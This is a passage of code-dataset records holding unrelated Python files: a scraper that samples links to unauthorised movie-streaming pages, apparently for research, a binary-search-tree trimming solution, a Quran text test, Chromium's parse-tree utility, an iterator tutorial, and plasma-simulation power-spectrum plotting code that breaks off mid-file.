getBaseUrl(url,soup):\n\n baseUrl = url\n if(soup is not None):\n base = soup.find('base')\n if((base is not None) and base.has_attr('href')):\n baseUrl = urljoin(baseUrl,base['href'])\n return baseUrl\n \n \ndef isUrlValid(url):\n\n regex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' 
# optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n return re.match(regex, url) is not None \n\n \ndef findTitleInPart(part, titles):\n\n if(len(part) < 6):\n return False\n for title in titles:\n movieness = 0\n for word in title:\n if(part.find(word) != -1):\n movieness += 1\n if(len(title) == 1 or movieness == 2):\n return True\n return False\n \n \ndef isMovieUrl(url,titles):\n\n parts = urlparse(url)\n queries = parse_qsl(parts.query)\n path = unquote_plus(parts.path)\n if(len(path) > 0 and path[-1] == '/'):\n path = path[:-1]\n pathEnd = path.split('/')[-1]\n for query in queries:\n part = unquote_plus(query[1])\n if(findTitleInPart(part.lower(),titles)):\n return True\n if(findTitleInPart(pathEnd.lower(),titles)):\n return True\n return False\n \n \ndef findIllegalStreams(movieTitles, seriesTitles):\n\n sampleSize = 4\n finalUrls = {}\n url = 'https://en.softonic.com/solutions/what-are-the-best-free-movie-streaming-sites-without-sign-up'\n # now redirects to: https://binge.co/what-are-the-best-free-movie-streaming-sites-without-sign-up\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'}\n\n runConfig = Config('runConfig.txt')\n display = Display(visible = 0, size = (1280, 768))\n display.start()\n scrapeType = {'name':'referrer','ua':'uaNormal','ref':True,'browser':'chrome','mobile':False}\n\n streamingSites = set()\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n links = soup.findAll('a', {'class': 'card-solution__title'})\n for link in links:\n try:\n subpage = requests.get(link['href'],headers=headers)\n except Exception as e:\n print('Error in loading streaming site: ', e)\n continue\n subsoup = BeautifulSoup(subpage.text, 'html.parser')\n \n streamingLink = subsoup.find('a', {'class': 'js-get-solution'})\n if(streamingLink is not None and streamingLink['href'] != ''):\n streamingSite = streamingLink['href']\n streamingSites.add(streamingSite)\n print(\"Number of streaming sites: \",len(streamingSites)) \n\n for streamingSite in streamingSites:\n print('Streaming site: ',streamingSite)\n if(not streamingSite.startswith('http')):\n streamingSite = 'http://'+streamingSite\n streamingDomain = rce.getDomain(streamingSite)\n follower = LinkFollow(1, runConfig, scrapeType, None)\n result = follower.followLink(streamingSite)\n try:\n follower.driver.quit()\n except:\n pass\n follower = None\n if(result is None):\n continue\n streamingSoup = BeautifulSoup(result[3], 'html.parser')\n baseUrl = getBaseUrl(streamingSite,streamingSoup)\n videoLinks = streamingSoup.findAll('a')\n movieUrls = set()\n seriesUrls = set()\n for videoLink in videoLinks:\n if(videoLink.has_attr('href')):\n videoUrl = urljoin(baseUrl,videoLink['href'])\n videoDomain = rce.getDomain(videoUrl)\n if(isUrlValid(videoUrl) and videoDomain == streamingDomain):\n if(isMovieUrl(videoUrl,movieTitles)):\n movieUrls.add(videoUrl)\n if(isMovieUrl(videoUrl,seriesTitles)):\n seriesUrls.add(videoUrl)\n \n sampleUrls = random.sample(list(movieUrls),min(len(movieUrls),sampleSize))\n if(len(sampleUrls) < sampleSize):\n sampleUrls += random.sample(list(seriesUrls),min(len(seriesUrls),sampleSize-len(sampleUrls)))\n \n for sampleUrl in sampleUrls:\n finalUrls[sampleUrl] = {'source':url}\n print('Number of copyright infringing URls selected: ',len(finalUrls))\n display.stop()\n return finalUrls\n\n\nif __name__ == '__main__':\n\n movieTitles, seriesTitles = getMovieTitles()\n finalUrls = findIllegalStreams(movieTitles, 
seriesTitles)\n","sub_path":"copyright.py","file_name":"copyright.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"567734591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 12 14:04:48 2017\n\n@author: owen\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \n# http://www.cnblogs.com/grandyang/p/7583185.html \n#class Solution(object):\n# def trimBST(self, root, L, R):\n# \"\"\"\n# :type root: TreeNode\n# :type L: int\n# :type R: int\n# :rtype: TreeNode\n# \"\"\"\n# # time O(n), space O(n)\n# if not root: \n# return None\n# if root.val < L:\n# return self.trimBST(root.right, L, R)\n# if root.val > R:\n# return self.trimBST(root.left, L, R)\n# root.left = self.trimBST(root.left, L, R)\n# root.right = self.trimBST(root.right, L, R)\n# return root\n \nclass Solution:\n def trimBST(self, root, L, R):\n \"\"\"\n :type root: TreeNode\n :type L: int\n :type R: int\n :rtype: TreeNode\n \"\"\"\n def trim(node):\n if not node:\n return None\n elif node.val > R:\n return trim(node.left)\n elif node.val < L:\n return trim(node.right)\n else:\n node.left = trim(node.left)\n node.right = trim(node.right)\n return node\n\n return trim(root)\n \nif __name__==\"__main__\":\n root=TreeNode(3)\n root.left=TreeNode(0)\n root.right=TreeNode(4)\n root.left.right=TreeNode(2)\n root.left.right.left=TreeNode(1)\n trimed=Solution().trimBST(root,1,3)\n print(trimed.val, trimed.left.val, trimed.left.left.val)","sub_path":"669. Trim a Binary Search Tree.py","file_name":"669. Trim a Binary Search Tree.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"555369919","text":"import unittest\nimport run\n\n\nclass TestParserMethods(unittest.TestCase):\n def test_plain(self):\n # self.assertEqual('foo'.upper(), 'FOO')\n verse = \"نَحْنُ أَعْلَمُ بِمَا يَقُولُونَ ۖ وَمَا أَنْتَ عَلَيْهِمْ بِجَبَّارٍ ۖ فَذَكِّرْ بِالْقُرْآنِ مَنْ يَخَافُ وَعِيدِ\"\n plain = run.strip_vowels(verse)\n maps = run.plain_ayahs_to_voweled()\n print(maps[plain])\n print(plain)\n \"\"\"\n def test_get_words(self):\n words = run.get_words(1)\n assert len(words) == 25\n\n def test_max_ayahs(self):\n max_lines = run.get_max_ayahs(55)\n '''\n for line, count in max_lines:\n print(line)\n print(str(count) + '\\n')\n '''\n assert max_lines[0][0][1] == 31\n \"\"\"\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test-driver.py","file_name":"test-driver.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"600707622","text":"# Copyright 2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom __future__ import print_function\n\nfrom __future__ import absolute_import\nimport parser\nimport symbol\nimport sys\nimport token\nimport tokenize\n\nfrom py_utils.refactor import offset_token\n\n\nclass Snippet(object):\n \"\"\"A node in the Python parse tree.\n\n The Python grammar is defined at:\n https://docs.python.org/2/reference/grammar.html\n\n There are two types of Snippets:\n TokenSnippets are leaf nodes containing actual text.\n Symbols are internal nodes representing higher-level groupings, and are\n defined by the left-hand sides of the BNFs in the above link.\n \"\"\"\n @property\n def type(self):\n raise NotImplementedError()\n\n @property\n def type_name(self):\n raise NotImplementedError()\n\n @property\n def children(self):\n \"\"\"Return a list of this node's children.\"\"\"\n raise NotImplementedError()\n\n @property\n def tokens(self):\n \"\"\"Return a tuple of the tokens this Snippet contains.\"\"\"\n raise NotImplementedError()\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n \"\"\"Spew a pretty-printed parse tree. Mostly useful for debugging.\"\"\"\n raise NotImplementedError()\n\n def __str__(self):\n return offset_token.Untokenize(self.tokens)\n\n def FindAll(self, snippet_type):\n if isinstance(snippet_type, int):\n if self.type == snippet_type:\n yield self\n else:\n if isinstance(self, snippet_type):\n yield self\n\n for child in self.children:\n for snippet in child.FindAll(snippet_type):\n yield snippet\n\n def FindChild(self, snippet_type, **kwargs):\n for child in self.children:\n if isinstance(snippet_type, int):\n if child.type != snippet_type:\n continue\n else:\n if not isinstance(child, snippet_type):\n continue\n\n for attribute, value in kwargs:\n if getattr(child, attribute) != value:\n break\n else:\n return child\n raise ValueError('%s is not in %s. Children are: %s' %\n (snippet_type, self, self.children))\n\n def FindChildren(self, snippet_type):\n if isinstance(snippet_type, int):\n for child in self.children:\n if child.type == snippet_type:\n yield child\n else:\n for child in self.children:\n if isinstance(child, snippet_type):\n yield child\n\n\nclass TokenSnippet(Snippet):\n \"\"\"A Snippet containing a list of tokens.\n\n A list of tokens may start with any number of comments and non-terminating\n newlines, but must end with a syntactically meaningful token.\n \"\"\"\n\n def __init__(self, token_type, tokens):\n # For operators and delimiters, the TokenSnippet's type may be more specific\n # than the type of the constituent token. E.g. the TokenSnippet type is\n # token.DOT, but the token type is token.OP. 
This is because the parser\n # has more context than the tokenizer.\n self._type = token_type\n self._tokens = tokens\n self._modified = False\n\n @classmethod\n def Create(cls, token_type, string, offset=(0, 0)):\n return cls(token_type,\n [offset_token.OffsetToken(token_type, string, offset)])\n\n @property\n def type(self):\n return self._type\n\n @property\n def type_name(self):\n return token.tok_name[self.type]\n\n @property\n def value(self):\n return self._tokens[-1].string\n\n @value.setter\n def value(self, value):\n self._tokens[-1].string = value\n self._modified = True\n\n @property\n def children(self):\n return []\n\n @property\n def tokens(self):\n return tuple(self._tokens)\n\n @property\n def modified(self):\n return self._modified\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n stream.write(' ' * indent)\n if not self.tokens:\n print(self.type_name, file=stream)\n return\n\n print('%-4s' % self.type_name, repr(self.tokens[0].string), file=stream)\n for tok in self.tokens[1:]:\n stream.write(' ' * indent)\n print(' ' * max(len(self.type_name), 4), repr(tok.string), file=stream)\n\n\nclass Symbol(Snippet):\n \"\"\"A Snippet containing sub-Snippets.\n\n The possible types and type_names are defined in Python's symbol module.\"\"\"\n\n def __init__(self, symbol_type, children):\n self._type = symbol_type\n self._children = children\n\n @property\n def type(self):\n return self._type\n\n @property\n def type_name(self):\n return symbol.sym_name[self.type]\n\n @property\n def children(self):\n return self._children\n\n @children.setter\n def children(self, value): # pylint: disable=arguments-differ\n self._children = value\n\n @property\n def tokens(self):\n tokens = []\n for child in self.children:\n tokens += child.tokens\n return tuple(tokens)\n\n @property\n def modified(self):\n return any(child.modified for child in self.children)\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n stream.write(' ' * indent)\n\n # If there's only one child, collapse it onto the same line.\n node = self\n while len(node.children) == 1 and len(node.children[0].children) == 1:\n print(node.type_name, end=' ', file=stream)\n node = node.children[0]\n\n print(node.type_name, file=stream)\n for child in node.children:\n child.PrintTree(indent + 2, stream)\n\n\ndef Snippetize(f):\n \"\"\"Return the syntax tree of the given file.\"\"\"\n f.seek(0)\n syntax_tree = parser.st2list(parser.suite(f.read()))\n tokens = offset_token.Tokenize(f)\n\n snippet = _SnippetizeNode(syntax_tree, tokens)\n assert not tokens\n return snippet\n\n\ndef _SnippetizeNode(node, tokens):\n # The parser module gives a syntax tree that discards comments,\n # non-terminating newlines, and whitespace information. 
Use the tokens given\n # by the tokenize module to annotate the syntax tree with the information\n # needed to exactly reproduce the original source code.\n node_type = node[0]\n\n if node_type >= token.NT_OFFSET:\n # Symbol.\n children = tuple(_SnippetizeNode(child, tokens) for child in node[1:])\n return Symbol(node_type, children)\n else:\n # Token.\n grabbed_tokens = []\n while tokens and (\n tokens[0].type == tokenize.COMMENT or tokens[0].type == tokenize.NL):\n grabbed_tokens.append(tokens.popleft())\n\n # parser has 2 NEWLINEs right before the end.\n # tokenize has 0 or 1 depending on if the file has one.\n # Create extra nodes without consuming tokens to account for this.\n if node_type == token.NEWLINE:\n for tok in tokens:\n if tok.type == token.ENDMARKER:\n return TokenSnippet(node_type, grabbed_tokens)\n if tok.type != token.DEDENT:\n break\n\n assert tokens[0].type == token.OP or node_type == tokens[0].type\n\n grabbed_tokens.append(tokens.popleft())\n return TokenSnippet(node_type, grabbed_tokens)\n","sub_path":"common/py_utils/py_utils/refactor/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"387585237","text":"#!/appdir/app/anaconda3/bin python3\n# -*- encoding: utf-8 -*-\n'''\n@File : iterNextPy.py\n@Time : 2020/11/24 20:58:45\n@Author : haiy1026 \n@Version : 1.0\n@Contact : 531739146@qq.com\n@License : (C)Copyright 2020-2030\n@Desc : None\n'''\nimport sys\n\n# list=[1,2,3,4]\n\n# it=iter(list)\n# print(next(it))\n\n# # 可用for\n# for i in it:\n# print(i)\n\n# # 或者用next\n# while True:\n# try:\n# print(next(it))\n# except StopIteration:\n# sys.exit()\n\n# 返回数字的迭代器\n# class MyNum:\n# def __iter__(self):\n# self.a=1\n# return self\n \n# def __next__(self):\n# if self.a<=20:\n# x=self.a\n# self.a+=1\n# return x\n# else:\n# raise StopIteration\n \n\n# print(\"haha \")\n# mc=MyNum()\n\n# miter=iter(mc)\n\n# for i in range(24):\n# print(next(miter))\n\n\n\n\n# 生成器 yield实现\n\ndef fibonacci(n):\n a,b,counter=0,1,0\n while True:\n if(counter >n):\n return\n yield a\n\n a,b=b,a+b\n counter+=1\nf=fibonacci(10)\n\nwhile True:\n try:\n print(next(f),end=\" \")\n except StopIteration:\n sys.exit()","sub_path":"iterNextPy.py","file_name":"iterNextPy.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"551794771","text":"#!/usr/bin/env python3\n\"\"\"\nPower spectrum of fields for the Cori runs\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport itertools\nimport json\nimport math\nimport multiprocessing\n\nimport h5py\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport palettable\nfrom matplotlib.collections import LineCollection\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection\nfrom scipy.optimize import curve_fit\n\nimport fitting_funcs\nimport pic_information\nfrom joblib import Parallel, delayed\nfrom json_functions import read_data_from_json\nfrom shell_functions import mkdir_p\n\nplt.style.use(\"seaborn-deep\")\nmpl.rc('text', usetex=True)\nmpl.rcParams['text.latex.preamble'] = \\\n[r\"\\usepackage{amsmath, bm}\",\n r\"\\DeclareMathAlphabet{\\mathsfit}{\\encodingdefault}{\\sfdefault}{m}{sl}\",\n r\"\\SetMathAlphabet{\\mathsfit}{bold}{\\encodingdefault}{\\sfdefault}{bx}{sl}\",\n r\"\\newcommand{\\tensorsym}[1]{\\bm{\\mathsfit{#1}}}\"]\nCOLORS = palettable.colorbrewer.qualitative.Set1_9.mpl_colors\n\n\ndef read_power_spectrum(fname):\n \"\"\"Read power spectrum data\n \"\"\"\n fdata = np.fromfile(fname, dtype=np.float32)\n sz, = fdata.shape\n kbins, fk = fdata[:sz//2], fdata[sz//2:]\n return kbins, fk\n\n\ndef var_labels():\n \"\"\"Labels for different variables\n \"\"\"\n labels = {\"ne\": \"n_e\",\n \"ni\": \"n_i\",\n \"bx\": \"B_x\",\n \"by\": \"B_y\",\n \"bz\": \"B_z\",\n \"ex\": \"E_x\",\n \"ey\": \"E_y\",\n \"ez\": \"E_z\",\n \"vex\": \"v_{ex}\",\n \"vey\": \"v_{ey}\",\n \"vez\": \"v_{ez}\",\n \"vix\": \"v_{ix}\",\n \"viy\": \"v_{iy}\",\n \"viz\": \"v_{iz}\"}\n return labels\n\n\ndef plot_power_spectrum(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for one variable at one time frame\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n var_name = plot_config[\"var_name\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n labels = var_labels()\n var_label = labels[var_name]\n fname = fdir + var_name + str(tindex) + '.kx'\n kx, fkx = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.ky'\n ky, fky = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.kz'\n kz, fkz = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp = read_power_spectrum(fname)\n\n smime = math.sqrt(pic_info.mime)\n dx_de = pic_info.dx_di * smime\n dy_de = pic_info.dy_di * smime\n dz_de = pic_info.dz_di * smime\n k1, k2 = 0.02, 0.5\n nkbins = 100\n\n idx = (np.abs(kx-k1)).argmin()\n idy = (np.abs(ky-k1)).argmin()\n idz = (np.abs(kz-k1)).argmin()\n fnorm = max(fkx[idx], fky[idy], fkz[idz]) * 2\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 *= fnorm / fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / fpower3[0]\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kx, fkx, linewidth=2, 
label=r'$k_x$')\n ax.loglog(ky, fky, linewidth=2, label=r'$k_y$')\n ax.loglog(kz, fkz, linewidth=2, label=r'$k_z$')\n ax.loglog(kpower, fpower1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=True)\n ax.tick_params(axis='y', which='major', direction='in')\n text1 = r'$' + var_label + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=20,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n\n fdir = '../img/power_spectrum/' + pic_run + '/' + var_name + '/'\n mkdir_p(fdir)\n fname = fdir + var_name + '_xyz_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kpara, fkpara, linewidth=2, label=r'$k_\\parallel$')\n ax.loglog(kperp, fkperp, linewidth=2, label=r'$k_\\perp$')\n ax.loglog(kpower, fpower1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=True)\n ax.tick_params(axis='y', which='major', direction='in')\n text1 = r'$' + var_label + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=20,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n fname = fdir + var_name + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef plot_power_spectrum_pub(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for one variable at one time frame for publication\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n var_name = plot_config[\"var_name\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n labels = 
var_labels()\n var_label = labels[var_name]\n fname = fdir + var_name + str(tindex) + '.kx'\n kx, fkx = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.ky'\n ky, fky = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.kz'\n kz, fkz = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp = read_power_spectrum(fname)\n\n k1, k2 = 0.02, 0.5\n nkbins = 100\n\n idx = (np.abs(kx-k1)).argmin()\n idy = (np.abs(ky-k1)).argmin()\n idz = (np.abs(kz-k1)).argmin()\n fnorm = max(fkx[idx], fky[idy], fkz[idz]) * 2\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 *= fnorm / fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / fpower3[0]\n\n fig = plt.figure(figsize=[3.5, 2.5])\n rect = [0.17, 0.16, 0.78, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kpara, fkpara, linewidth=1, label=r'$k_\\parallel$')\n ax.loglog(kperp, fkperp, linewidth=1, label=r'$k_\\perp$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 10}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=False)\n ax.tick_params(axis='y', which='major', direction='in')\n twci = math.ceil((tframe * pic_info.dt_fields) / 0.1) * 0.1\n text1 = r'$t\\Omega_{ci}=' + (\"{%0.0f}\" % twci) + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=10,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n ax.set_ylim([1E-7, 2E-1])\n ax.set_yticks((np.logspace(-7, -1, 4)))\n ax.set_xlabel(r'$kd_e$', fontsize=10)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=10)\n ax.tick_params(labelsize=8)\n fdir = '../img/power_spectrum_pub/' + pic_run + '/' + var_name + '/'\n mkdir_p(fdir)\n fname = fdir + var_name + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef magnetic_power_spectrum(plot_config, show_plot=True):\n \"\"\"Plot power spectrum of magnetic field\n Args:\n plot_config: plot configuration\n \"\"\"\n tframe = plot_config[\"tframe\"]\n bg = plot_config[\"bg\"]\n pic_runs = [\"2D-Lx150-bg\" + str(bg) + \"-150ppc-16KNL\"]\n pic_runs.append(\"3D-Lx150-bg\" + str(bg) + \"-150ppc-2048KNL\")\n pic_run = pic_runs[1]\n root_dir = \"/net/scratch3/xiaocanli/reconnection/Cori_runs/\"\n pic_run_dir = root_dir + pic_run + \"/\"\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n k1, k2 = 0.03, 1.0\n nkbins = 100\n pindex = -2.7\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower3 = kpower**pindex / 1E4\n\n fig = plt.figure(figsize=[3.5, 2.5])\n rect = [0.17, 0.16, 0.78, 0.8]\n ax = fig.add_axes(rect)\n COLORS = palettable.tableau.Tableau_10.mpl_colors\n ax.set_prop_cycle('color', COLORS)\n tframes = range(10, 36, 5)\n\n for tframe in tframes:\n tindex = tframe * pic_info.fields_interval\n for ivar, var in enumerate([\"bx\", 
\"by\", \"bz\"]):\n fdir = ('../data/power_spectrum/' + pic_run +\n '/power_spectrum_' + var + '/')\n fname = fdir + var + str(tindex) + '.para'\n kpara, fdata = read_power_spectrum(fname)\n if ivar > 0:\n fkpara += fdata\n else:\n fkpara = fdata\n fname = fdir + var + str(tindex) + '.perp'\n kperp, fdata = read_power_spectrum(fname)\n if ivar > 0:\n fkperp += fdata\n else:\n fkperp = fdata\n ax.loglog(kperp, fkperp, linewidth=1, label=r'$k_\\perp$')\n\n label1 = r'$\\propto k_\\perp^{' + str(pindex) + '}$'\n ax.loglog(kpower, fpower3, linewidth=0.5, color='k',\n linestyle='--', label=label1)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=False)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=False)\n ax.tick_params(axis='y', which='major', direction='in')\n twci = math.ceil((tframe * pic_info.dt_fields) / 0.1) * 0.1\n # text1 = r'$t\\Omega_{ci}=' + (\"{%0.0f}\" % twci) + '$'\n ax.text(0.7, 0.47, label1, color='k', fontsize=10,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 5E0])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_yticks((np.logspace(-7, -1, 4)))\n ax.set_xlabel(r'$k_\\perp d_e$', fontsize=10)\n ax.set_ylabel(r'$E_B(k_\\perp)$', fontsize=10)\n ax.tick_params(labelsize=8)\n\n # Embedded plot for energy evolution\n rect1 = [0.29, 0.29, 0.30, 0.28]\n ax1 = fig.add_axes(rect1)\n ax1.tick_params(bottom=True, top=True, left=True, right=True)\n ax1.tick_params(axis='x', which='minor', direction='in', top=False)\n ax1.tick_params(axis='x', which='major', direction='in')\n ax1.tick_params(axis='y', which='minor', direction='in')\n ax1.tick_params(axis='y', which='major', direction='in')\n\n for irun, pic_run in enumerate(pic_runs):\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n enorm = pic_info.ene_magnetic[0]\n ene_bx = pic_info.ene_bx\n ene_by = pic_info.ene_by\n ene_bz = pic_info.ene_bz\n ene_magnetic = pic_info.ene_magnetic\n ene_electric = pic_info.ene_electric\n kene_e = pic_info.kene_e\n kene_i = pic_info.kene_i\n ene_bx /= enorm\n ene_by /= enorm\n ene_bz /= enorm\n ene_magnetic /= enorm\n kene_e /= enorm\n kene_i /= enorm\n tenergy = pic_info.tenergy\n\n lstyle = '-' if '3D' in pic_run else '--'\n ax1.plot(tenergy, ene_magnetic, linewidth=1,\n linestyle=lstyle, color='k')\n ax1.set_ylim([0.66, 1.02])\n # for iframe, tframe in enumerate(tframes):\n # twci = tframe * pic_info.dt_fields\n # ax1.plot([twci, twci], ax1.get_ylim(), linewidth=0.5,\n # linestyle=':', color=COLORS[iframe])\n tframes = np.asarray(tframes) * pic_info.dt_fields\n nframe, = tframes.shape\n ax1.scatter(tframes, [0.7]*nframe, c=COLORS[:nframe],\n marker='x', s=10, linewidth=0.5)\n ax1.text(0.6, 0.28, \"2D\", color='k', fontsize=6,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='center', verticalalignment='center',\n transform=ax1.transAxes)\n ax1.text(0.6, 0.52, \"3D\", color='k', fontsize=6,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='center', verticalalignment='center',\n transform=ax1.transAxes)\n ax1.tick_params(labelsize=6)\n ax1.set_xlabel(r'$t\\Omega_{ci}$', fontsize=6)\n ax1.set_ylabel(r'$\\varepsilon_B/\\varepsilon_{B0}$', fontsize=6)\n ax1.set_xlim([0, 400])\n\n fdir = 
